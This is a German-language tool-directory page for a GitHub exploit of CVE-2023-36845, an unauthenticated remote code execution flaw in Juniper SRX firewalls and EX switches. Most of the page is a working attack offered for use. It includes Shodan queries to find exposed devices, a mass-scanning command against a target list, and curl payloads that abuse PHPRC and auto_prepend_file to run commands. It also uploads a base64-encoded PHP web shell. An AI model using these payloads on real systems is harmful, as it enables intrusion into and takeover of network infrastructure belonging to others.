Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-36845 — Juniper Firewalls CVE-2023-36845 - RCE | Kitploit
Tools/GitHubGitHub/kljunowsky/cve-2023-36845
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubkljunowsky/cve-2023-36845

CVE-2023-36845

Juniper Firewalls CVE-2023-36845 - RCE

Repository anzeigen
5513vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-36845

Beschreibung

CVE-2023-36845 stellt eine bemerkenswerte Schwachstelle zur Manipulation von PHP-Umgebungsvariablen dar, die Juniper SRX Firewalls und EX Switches betrifft. Obwohl Juniper diese Schwachstelle als mittelschwer eingestuft hat, werden wir in diesem Artikel erläutern, wie diese einzelne Schwachstelle für Remote-Codeausführung ohne Authentifizierung ausgenutzt werden kann.

Suche - Shodan

root@kitploit:~
title:"Juniper Web Device Manager"
Bild
root@kitploit:~
title:"Juniper" http.favicon.hash:2141724739
Bild

Verwendung 🛠

Erkennung

root@kitploit:~
python3 CVE-2023-36845.py -f targets.txt -o output.txt

RCE 🧨

Option 1

Die Verwendung eines beliebigen Protokoll-Wrappers in Verbindung mit auto_prepend_file ist möglich. Die am besten geeignete Wahl für diesen Vorgang ist das data://-Protokoll, das die Bereitstellung der "sekundären Datei" inline ermöglicht. Hier ist eine anspruchsvolle Darstellung dieses Exploits, der das eingebettete <? phpinfo(); ?> innerhalb des data://-Schemas ausführt:

root@kitploit:~
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'

Führe whoami-Befehl aus

<?php shell_exec('whoami'); ?>

root@kitploit:~
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="'

Option 2

Eine Datei hochladen

<?php if(isset($_REQUEST[cmd])){ echo "<pre>"; $cmd = ($_REQUEST[cmd]); system($cmd); echo "</pre>"; die; }?>

root@kitploit:~
$ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo=
", "csize": 110}]'

Parameter 🧰

ParameterBeschreibungTyp
--file / -fEingabe der ZiellisteDatei
-oAusgabedateiDatei

Kontakt 📇

LinkedIn - Milan Jovic

Tool herunterladen